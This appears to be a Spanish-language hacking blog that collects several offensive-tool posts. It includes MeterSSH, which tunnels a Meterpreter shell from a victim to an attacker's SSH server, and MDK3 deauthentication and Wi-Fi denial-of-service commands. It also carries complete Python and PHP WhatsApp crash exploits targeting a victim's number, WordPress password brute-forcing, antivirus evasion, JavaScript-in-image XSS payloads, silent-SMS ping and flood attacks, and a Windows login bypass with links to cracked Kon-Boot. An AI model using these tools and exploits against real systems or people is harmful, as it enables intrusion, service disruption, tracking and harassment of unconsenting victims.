MeterSSH - Meterpreter via SSH

MeterSSH es una manera relativamente sencilla de inyectar un shellcode nativo en la memoria y enviar todo al atacante a travez de un tunel ssh y todo con un solo archivo python. Python puede ser convertido a ejecutable a travez de pyinstaller o py2exe.

MeterSSH es sencillo – simplemente editamos el archivo meterssh.py y agregamos la ip, puerto, usuario y contraseña de nuestro servidor SSH y corremos el script. Lanzara un meterpreter mediante inyeccion de memoria (en este caso windows/meterpreter/bind_tcp) asociado al puerto 8021. El modulo Paramiko (python SSH module) es utilizado para tunelizar meterpreter a travez del puerto 8021 a la maquina atacante.

Lanzamos el payload meterssh:

Luego corremos monitor.py el cual monitorea la conexion ssh y lanza automaticamente Metasploit una vez que detecta la conexion.


Luego,  Metasploit es lanzado y tenemos una sesion meterpreter en la maquina victima a travez de un tunel ssh.


Descargar MeterSSH desde Github

Hay dos archivos, monitor.py and meterssh.py.

monitor.py – corremos este script para monitorear o escuchar conexiones SSH, una vez detectada lanza metasploit automaticamente.

meterssh.py – esto es lo que necesitamos correr en la maquina victima – como no todas las maquinas tienen Python instalado debemos compilarlo para que sea ejecutable con py2exe o pyinstaller.

Los campos que debemos editar en meterssh.py:

user = “USUARIO”
# password for SSH
password = “CONTRASEÑA”
# this is where your SSH server is running
rhost = “IP”
# remote SSH port – this is the attackers SSH server
port = “PUERTO"

Fuente: www.trustedsec.com

MDK3 Atacando Access Points

MDK3 es una herramienta para testear puntos de acceso o routers inalambricos, realizando ataques de denegacion de servicio. Tiene algunas opciones y posibilidades interesantes como realizar fuerza bruta a filtros mac, o a ssids ocultos, inundar el espectro con ap's falsos, desconectar a alguien de la red, etc.

Modo de uso:

mdk3 <interfaz> <modo de testeo> [opciones]

para mas información mdk3 --fullhelp

Algunos ejemplos de ataques y modos de testeo.

Hacer visible un SSIDs mediante ataque de diccionario o fuerza bruta.

Diccionario:
mdk3 [interfaz] p -c [canal] -t [bssid] -f [path al diccionario] -s [paquetes por segundo]

Fuerza Bruta:
mdk3 [interfaz] p -c [canal] -t [bssid] -b [caracteres a usar] -s [paquetes por segundo]

Los caracteres pueden ser:
a: todos los caracteres
l: solo minusculas
u: solo mayusculas
n: solo números
c: mayusculas y minusculas
m: mayusculas, minusculas y numeros

Para los siguientes ataques se necesita colocar el interfaz en modo promiscuo/modo monitor.

Ataque Beacon Flood.
Este ataque envía beacons y llena el espectro de “aps falsos”
primero establecemos el modo de ataque b, y luego las diferentes opciones:
-n establece un ssid
-f <nombredearchivo> obtiene los ssid desde archivo
-v <nombredearchivo> obtiene los ssid y macs de archivo
-w encripcion wep
-g muestra la estación como 54mb
-d muestra a la estación como ad-hoc
-t muestra la estacion usando una encriptacion  WPA TKIP
-a muestra la estación usando una encriptacion WPA AES
-m utiliza una MAC valida
-h salta al canal del ap spoofeado
-c canal
-s velocidad de paquetes por segundo

mdk3 [interfaz] b -n [SSID que queramos] -w -g -m -s 50


Ataque de DoS de Autenticacion.
Se realizan tantas peticiones de autenticación a un AP que podría reiniciarlo o crashearlo.
Establecemos modo de ataque a y las opciones:
-a mac del ap a testear
-m utiliza una MAC valida
-s velocidad de paquetes por segundo

mdk3 [interfaz] a -a [bssid victima] -m

Ataque para echar o kickear clientes de un AP.
Necesitamos crear un archivo de texto con las MAC a atacar
Establecemos modo de ataque d y las opciones:
-w <nombredearchivo> archivo que contiene macs a ignorar (whitelist)
-b <nombredearchivo> archivo con las macs a sestear (blacklist)
-s paquetes por segundo
-c canal

mdk3 [interfaz] d -b archivoconlasmac.txt -c 1 -s 250

Ataque Michael (TKIP).
Establecemos el modo de ataque m y las opciones:
-t <bssid victima>
-w <segundos> segundos entre “rafagas” de ataque por default 10
-n <paquetes por rafagas> por default 70
-j utiliza el QoS-exploit, se requieren menos paquetes para hacer caer el AP
-s velocidad de paquetes por segundo

mdk3 [interfaz] m -t <bssid victima> -w 15 -n 100 -s 100  

Ataque de fuerza bruta a un filtro MAC.
Este ataque utiliza una lista de direcciones mac conocidas y trata de autenticarlas con el ap objetivo. Actualmente solo funciona en AP's que deniegan una autenticacion abierta de manera correcta.

Establecemos modo f y las opciones:
-t <bssid> el bssid victima.
-m <mac> establece un rango de direcciones mac a utilizar (3 bytes, por ejemplo 00:12:34) sin la opcion -m, se utiliza la base de datos interna.
-f <mac> establece por que direccion mac empezar el testeo.
No se puede utilizar -f y -m al mismo tiempo.

mdk3 [interfaz] f -t <bssid>

Me olvidaba, la idea en algunos de estos ataques es por ejemplo que se reinicie el ap para obtener el wps, u obligar a que se haga un reseteo y asi tener las configuraciones por default, pero tambien sirve por ejemplo para atacar Drones.

[Python] WhatsApp Remote Reboot/Crash App Android Yowsup

Nuevamente desde #RemoteExecution un ataque que permite "crashear" un telefono mediante whatsapp, fue probado en android, insertar el mensaje que aparece en http://pastebin.com/raw.php?i=CZChGAnG luego de " message = message = " al final del codigo.

  # Mirror: http://pastebin.com/raw.php?i=CZChGAnG # Video: https://www.youtube.com/watch?v=V7bnLOohqqI #!/usr/bin/python #-*- coding: utf-8 -* # Title: WhatsApp Remote Reboot/Crash App Android # Product: WhatsApp # Vendor Homepage: http://www.whatsapp.com # Vulnerable Version(s): 2.11.476 # Tested on: WhatsApp v2.11.476 on MotoG 2014 -Android 4.4.4 # Date: 26/12/2014 # #RemoteExecution - www.remoteexecution.net # # Author Exploit: # Daniel Godoy @0xhielasangre <danielgodoy@gobiernofederal.com> # Credits: # Gonza Cabrera # # Reference: http://foro.remoteexecution.net/index.php/topic,569.0.html # # Custom message with non-printable characters will crash any WhatsApp client < v2.11.476 for android. # It uses Yowsup library, that provides us with the options of registration, reading/sending messages, and even # engaging in an interactive conversation over WhatsApp protocol # import argparse, sys, os, csv from Yowsup.Common.utilities import Utilities from Yowsup.Common.debugger import Debugger from Yowsup.Common.constants import Constants from Examples.CmdClient import WhatsappCmdClient from Examples.EchoClient import WhatsappEchoClient from Examples.ListenerClient import WhatsappListenerClient from Yowsup.Registration.v1.coderequest import WACodeRequest from Yowsup.Registration.v1.regrequest import WARegRequest from Yowsup.Registration.v1.existsrequest import WAExistsRequest from Yowsup.Registration.v2.existsrequest import WAExistsRequest as WAExistsRequestV2 from Yowsup.Registration.v2.coderequest import WACodeRequest as WACodeRequestV2 from Yowsup.Registration.v2.regrequest import WARegRequest as WARegRequestV2 from Yowsup.Contacts.contacts import WAContactsSyncRequest import threading,time, base64 DEFAULT_CONFIG = os.path.expanduser("~")+"/.yowsup/auth" COUNTRIES_CSV = "countries.csv" DEFAULT_CONFIG = os.path.expanduser("~")+"/.yowsup/auth" ######## Yowsup Configuration file ##################### # Your configuration should contain info about your login credentials to Whatsapp. This typically consist of 3 fields:\n # phone: Your full phone number including country code, without '+' or '00' # id: This field is used in registration calls (-r|-R|-e), and for login if you are trying to use an existing account that is setup # on a physical device. Whatsapp has recently deprecated using IMEI/MAC to generate the account's password in updated versions # of their clients. Use --v1 switch to try it anyway. Typically this field should contain the phone's IMEI if your account is setup on # a Nokia or an Android device, or the phone's WLAN's MAC Address for iOS devices. If you are not trying to use existing credentials # or want to register, you can leave this field blank or set it to some random text. # password: Password to use for login. You obtain this password when you register using Yowsup. ###################################################### MINE_CONFIG ="config" def getCredentials(config = DEFAULT_CONFIG): if os.path.isfile(config): f = open(config) phone = "" idx = "" pw = "" cc = "" try: for l in f: line = l.strip() if len(line) and line[0] not in ('#',';'): prep = line.split('#', 1)[0].split(';', 1)[0].split('=', 1) varname = prep[0].strip() val = prep[1].strip() if varname == "phone": phone = val elif varname == "id": idx = val elif varname =="password": pw =val elif varname == "cc": cc = val return (cc, phone, idx, pw); except: pass return 0 def main(phone): credentials = getCredentials(MINE_CONFIG or DEFAULT_CONFIG ) if credentials: countryCode, login, identity, password = credentials identity = Utilities.processIdentity(identity) password = base64.b64decode(password) # Custom message that will crash WhatsApp message = message = "#RemoteExecution "

Vane - WPScaner version GPL

Como muchos saben WPScan se volvio comercial, asi que los ex miembros del equipo hicieron una version gratuita del escaner de vulnerabilidades de WordPress que ahora se llama Vane.

Descargarlo > https://github.com/delvelabs/vane

Pre-requisitos para instalarlo

    Windows no soporta.
    Ruby => 1.9
    RubyGems
    Git

Argumentos en Vane

   
   
 –update

    Actualiza a la ultima version
    –url | -u

    El dominio o url del WordPress a escanear.
    –force | -f

    Fuerza un escaneo, se haya o no detectado un WordPress.
    –enumerate | -e [opcion(es)]

    Enumera. opcion : u usuarios id de 1 al 10 u[10-20] usuarios del id 10 al 20 (se debe agregar el [] ) p plugins vp solo plugins vulnerables, ap todos los plugins (puede tomar mucho tiempo) tt timthumbs, t themes vp solo thems vulnerables, at todos los themes (puede tomar muhco tiempo) Se permiten multiples valores : ‘-e tt,p’ enumera timthumbs y plugins, si no se aclara, por default toma ‘vt,tt,u,vp’

    –exclude-content-based ”

    Esta opcion de enumeracion, excluye todo lo basado en el regexp o una string que agreguemos, no se necesita atribuir delimitadores al regexp, pero necesitamos agregar comillas (simple o dobles)

    –config-file | -c

    config file especifico

    –follow-redirection

    si la url tiene una redireccion, la seguira sin preguntar si queremos o no.

    –wp-content-dir

    Trata de encontrar el directorio content (ej wp-content) escaneando el index, de todas maneras se puede especificar. se permiten los subdirectorios.

    –wp-plugins-dir

    Al igual que –wp-content-dir pero para el directorio de plugins. 

    –proxy <[protocol://]host:port>

    Suministramos una proxy (sobreescribe la que esta en conf/browser.conf.json). HTTP, SOCKS4 SOCKS4A y SOCKS5 tienen soporte. si no se le asigna un protocolo (format host:port), se usa HTTP.

    –proxy-auth usuario:contraseña

    Asigna el logueo al proxy (sobreescribe la que esta en conf/browser.conf.json).

    –basic-auth usuario:contraseña

    autenticacion HTTP basica.

    –wordlist | -w

    Suministra una wordlist (lista de palabras) de contraseñas para atacar via fuerza bruta.

    –threads | -t

    El numero de threads o hilos a usar. (sobreescribe el valor en conf/browser.conf.json)

    –username | -U

    Hace un ataque de fuerza bruta al usuario asignado.

Ejemplos

Checkeo no intrusivo.

ruby vane.rb --url www.ejemplo.com

Ataque de fuerza bruta de contraseña en los usuarios enumerados usando 50 threads.

ruby vane.rb --url www.ejemplo.com --wordlist lista.lst --threads 50

Ataque de fuerza bruta de contraseña solo en el admin

ruby vane.rb --url www.ejemplo.com --wordlist lista.lst --username admin

Enumerar plugins instalados

ruby vane.rb --url www.ejemplo.com --enumerate p

Fuente: https://github.com/delvelabs/vane & n0where.net

[PHP] Crashear WhatsApp usando WhatsAPI

PoC WhatsApp Crash

Como siempre, en la comunidad Remote Execution, se hacen excelentes aportes, el autor de esta herramienta o exploit y de la prueba de concepto es el_rodrix, que utiliza la api WhatsAPI + un codigo en php para Crashear el whatsapp de nuestra victima. Fue probado en un telefono con android.

          <?php /* * Title: WhatsApp Remote Crash with PHP * Product: WhatsApp * Vendor Homepage: http://www.whatsapp.com * Vulnerable Version(s): 2.11.476 * Tested on: WhatsApp v2.11.476 on Samsung Galaxy S4 2015 -Android 4.3 * Mirror: http://pastebin.com/Ktu45GN0 * Date: 05/02/2015 * * Author Exploit: * Rodrigo Avila - @el_rodrix - <rodrigo398@hotmail.com> * Credits: * Daniel Godoy - @0xhielasangre - <danielgodoy@gobiernofederal.com> * Gonza Cabrera - @Gonnza_Cabrera - <gonnza.cabrera@gmail.com> * * Reference: http://foro.remoteexecution.net/index.php/topic,569.0.html * http://underc0de.org/foro/android/(poc)-crashear-la-app-de-un-contacto-de-whatsapp-(android)/msg82880/ * http://www.exploit-db.com/exploits/35637/ * http://www.exploit-db.com/exploits/32865/ * * Custom message with non-printable characters will crash any WhatsApp client < v2.11.476 for android. * It uses WhatsAPI library, that provides us with the options of registration, reading/sending messages, and even * engaging in an interactive conversation over WhatsApp protocol */ require 'src/whatsprot.class.php'; function fgets_u($pStdn) { $pArr = array($pStdn); if (false === ($num_changed_streams = stream_select($pArr, $write = NULL, $except = NULL, 0))) { print("\$ 001 Socket Error : UNABLE TO WATCH STDIN.\n"); return FALSE; } elseif ($num_changed_streams > 0) { return trim(fgets($pStdn, 1024)); } return null; } $nickname = "RemoteExecution"; $sender = "549XXXXXXXXXX"; // Mobile number with country code (but without + or 00) $imei = ""; // MAC Address for iOS IMEI for other platform (Android/etc) $password = "XXXXXXXXXXXXXXXXXXXXXXXXXXXX"; // Password you received from WhatsApp $msg = "#RemoteExecution"; //Copy paste and send this message -> http://pastebin.com/bStYBbpd $usage = "USAGE: ".$_SERVER['argv'][0]." <phone>\n \tphone: full number including country code, without '+' or '00'\n"; if ($argc < 2) { echo $usage; exit(1); } if (is_numeric($_SERVER['argv'][1])){ if (strlen($_SERVER['argv'][1]) == 13){ $dst = $_SERVER['argv'][1]; echo "[] Logging in as '$nickname' ($sender)\n"; $wa = new WhatsProt($sender, $imei, $nickname, false); $wa->connect(); $wa->loginWithPassword($password); echo "\n[] Send message to $dst: $msg\n"; $wa->sendMessage($dst , $msg); echo "\n"; exit(0); }else{ echo $usage; } }else{ echo $usage; }


Modo de uso, en la consola:

php wacrash.php 549XXXXXXXXXX

Recuerden que el numerp de contacto que van a crashear debe ser de 13 dígitos.

En la variable $msg deben copiar y pegar el contenido del pastebin siguiente

http://pastebin.com/bStYBbpd

Veil Evasion

Leyendo un poco el blog de Christopher Truncer encontre el Veil-Evasion que es una herramienta para generar payloads ejecutables compatibles con Metasploit para evadir los antivirus, en python.
El codigo para descargar se encuentra en https://www.github.com/Veil-Framework/Veil-Evasion/ y es parte de un proyecto mas grande "Veil Framework" que se encuentra en https://github.com/Veil-Framework/Veil el cual los autores recomiendan tambien descargar e instalar.

Como se puede ver el uso es bastante sencillo, es cuestion de ir eligiendo que tipo de encriptacion queremos darle al payload. Para mas informacion del autor y sobre la tool pueden visitar su blog https://www.christophertruncer.com/veil-a-payload-generator-to-bypass-antivirus/

Segun lei la ultima actualizacion fue el 15 de septiembre, pero tambien pueden ver sobre actualizaciones, cambios, informacion etc en https://www.veil-framework.com/

NetHunter

La gente de Offensive Security, creadores de los ya conocidos Backtracks y Kali Linux,  nos sorprenden con un proyecto en el que vienen trabajando, segun ellos, hace ya un tiempo y ahora actualizado, el Kali NetHunter, se trata de una plataforma de testeos de penetracion sobre ARM basado en Kali para Android, particularmente para los Nexus.
 Ademas de las ya conocidas herramientas de Kali, agregaron algunas caracteristicas unicas y especiales como la posibilidad de tener una session full de VNC desde el telefono. Pero esto no termina ahi.
 Tambien tiene pre-programados ataques HID Keyboard, BadUSB Man In The Middle (Presentado en la conferencia BlackHat 2014), Evil Access Points, Rogue AP, etc.

Actualmente y por el momento, segun sus creadores, es solo compatible con los siguientes dispositivos:

    Nexus 5 (GSM/LTE) - “hammerhead”
    Nexus 7 [2012] (Wi-Fi) - “nakasi”
    Nexus 7 [2012] (Mobile) - “nakasig”
    Nexus 7 [2013] (Wi-Fi) - “razor”
    Nexus 7 [2013] (Mobile) - “razorg”
    Nexus 10 - “mantaray”

Lo pueden descargar de aca, http://nethunter.com/, y tambien en la misma web, nos dan una explicacion paso a paso de como instalar.

El dispositivo tiene que estar Rooteado y debe tener habilitado el Modo Desarollador (Developer Mode).

Yo lo tengo instalado en mi Nexus 7, y la verdad que va como piña, justamente lo actualize ayer, y ahora tiene un monton de herramientas nuevas, y la posibilidad de agregar hardware como el HackRF con el Rf Analyzer. Otro ataque es el del post anterior de Bypass con DriveDroid y Kon-boot. Como les decia, cargado con un monton de herramientas, muy estable, y lo importante, nadie sospecha de una tablet o un telefono.

ImageJs: Inyectado javascript a una imagen

ImageJs

Pequeña herramienta para incluir un javascript en un archivo de imagen valido.
Actualmente soporta gif y bmp.

Uso:

Correr 'make' para compilar y luego run 'imagejs option jsfile.js' el archivo imagen de salida tendra el nombre del archivo de entrada + extension de imagen .. Las opciones son .bmp y .gif

Example:

$ ./imagejs gif code.js
crea el archivo code.js.gif

se pueden descargar los binarios compilados de jklmnn.de.

Los archivos soportados: gif, bmp, webp, pnm

Background:

Esta herramienta permite crear una imagen que corre un codigo Javascript. Un archivo como este tiene la capacidad de extender las posibilidades de una explotacion via XSS. Por ejemplo, desde imagenes de perfil.

Autores: Ajin Abraham (Concepto) Jklmnn (Codigo)

Descarga: https://github.com/jklmnn/imagejs

Traducido desde https://github.com/jklmnn/imagejs

+ info: http://jklmnn.de/imagejs/

y el aporte de gonza_cabrera

Un enlace para profundizar su uso utilizando algun Framework de explotacion de XSS como BeeF.
http://iamajin.blogspot.in/2014/11/when-gifs-serve-javascript.html 

Xposed SMS class 0

Por si no se nota, cambie de ios a android, para hacking con dispositivos moviles (tablets y telefonos).

Investigando un poco, mas que nada la localizacion de dispositivos, porque una amiga recibio un mensaje, de los que se dice son de una trata de blancas o de reclusos para intentar secuestros virtuales, me encontre con algunas cosas interesantes, entre esas: SMS Invisibles, Class 0 SMS, Silent Messages, etc.
Que son un tipo de ataque, tengo entendido que usa la policia en alemania, para localizar dispositivos. Se envia un sms, el cual el destinatario no puede verlo (no hay mensaje, notificacion, sonido, es como si no pasara nada), y el telefono solo devuelve una respuesta con las coordenadas, supongo que la localizacion se hace mediante las torres de comunicacion, tambien se pueden realizar ataques tipo Ddos para gastar la bateria, etc.

La verdad no tenia idea de como hacerlo, asique pedi ayuda a la gente del foro, y zorrokin trajo la solucion.
Se utiliza el framework Xposed, y el modulo Hushsms

Lo bajan de http://repo.xposed.info/module/de.robv.android.xposed.installer
Los que tienen lollipop de http://forum.xda-developers.com/showthread.php?t=3034811
En lollipop instalan la app y despues por recovery (twrp, cwm) flashean el zip que contiene el framework.
Y despues instalan la app que envía los sms
Una vez que la instalen abren xposed se van a módulos y activan hushsms, reinician el teléfono y listo ya pueden usar hushsms y enviar mensajes de tipo class 0. (cita Zorrokin)

- Los mensajes Class 0 llegan tipo push, es decir aparecen en la pantalla como notificacion, pero no se pueden guardar, hay paises u operadoras donde aparecen Anonimos y otros en que no.
- La opcion Sms Ping, sirve para localizar telefonos (en teoria), tambien en algunos paises esta prohibido, alemania usaba este tipo de sms para localizar gente, devuelve las coordenadas al remitente y no avisa al destinatario. (tambien se hacia como un ddos con sms ping para descargar la bateria del destinatario)
- Wap push es tambien un mensaje push pero al que se puede incorporarle un link.
- MWI Message, esta opcion permite activar y desactivar el icono que nos avisa que tenemos un mensaje en el buzon de voz, se coloca el numero de la "victima", y podemos activar o desactivar el icono a nuestro gusto, la victima llama al buzon de voz y aparece somo si no tuviera nada, pero la notificacion va a seguir apareciendo hasta que desactivemos. En teoria la unica forma que tienen de hacerlo desaparecer es hacer un wipe.
- MMS Notification, se utiliza para promociones (puede que funcione de forma anonima) y si no me equivoco tambien se puede agregar un link para descarga.
- Replace SMS, sirve para reemplazar mensajes que ya hemos enviado.

Nota. No todas las opciones funcionan para "atacar" un Iphone.

---

App SMS Ping Flood

https://mega.co.nz/#!YMMxTaDK!T6NDwfJkMNlKMOg1vQ0XBojxhMLCFb3VB4D1nhG4PKI

Volvi! DriveDroid + Kon-Boot = Login Bypass

Disculpen, de tanto posponer posteos, se me pasaron dos años (?) no siempre tenemos tiempo, pero prometo actualizar el blog mas de seguido, y traer posteos que hago en el foro aca.
 -----------------

DriveDroid + Kon-Boot = Login Bypass 

Drive Droid es una aplicacion para android, que la podemos encontrar en Google Play, que nos permite bootear una imagen .iso o .img desde nuestro dispositivo android actuando como un usb o cd. Esto nos sirve para correr una distro linux o un inicio seguro de windows sin necesidad de ir quemando distintos cds o grabandolos en un usb.
Desde la aplicacion podemos descargar imagenes (iso o img) y agregar distintas desde archivo.

Ahora bien, la parte interesante. Jugando con NetHunter, la version ARM de Kali Linux, encontre un tutorial de offensive security donde utilizando esta aplicacion y una img de Kon-Boot 2.4 bypassean el login de windows hasta 8.1 inclusive, y de OSx Yosemite. El procedimiento es bastante sencillo:

- Se conecta el dispositivo mediante usb a la pc o mac.
- Abrimos DriveDroid y elegimos la imagen de KonBoot 2.4 y dejamos que cargue.
- Al prender o reinciar la pc o mac, entramos al menu de booteo BIOS.
- Elegimos que bootee desde USB (o cd, algunas pcs lo toman como cd, la aplicacion nos avisa)
- Una vez que vuelva a arrancar windows, nos aparecera el menu de login, pero vamos a poder entrar sin usar contraseña, solo dando enter.

Hasta aca todo muy lindo, pero de mi parte es solo teoria, porque no pude conseguir el Kon-Boot ya que ahora se volvio comercial, si alguien lo consigue bienvenido sea, peeero podemos cargar otras distros como Ophcrack, o alguna para hacer analisis forense o inclusive el mismo kali.

Aca un video de como lo hace la gente de Offensive Security.

Video: https://vimeo.com/113732824

DriveDroid: https://play.google.com/store/apps/details?id=com.softwarebakery.drivedroid&hl=es
------

Ya me enviaron un link del Kon-boot :)

https://mega.co.nz/#!NYNm3QJQ!mUjG1bi-4gwAj9ZahCbqtZdyJF8Wo2T7rnLP1ZzawPM (No se que version sera).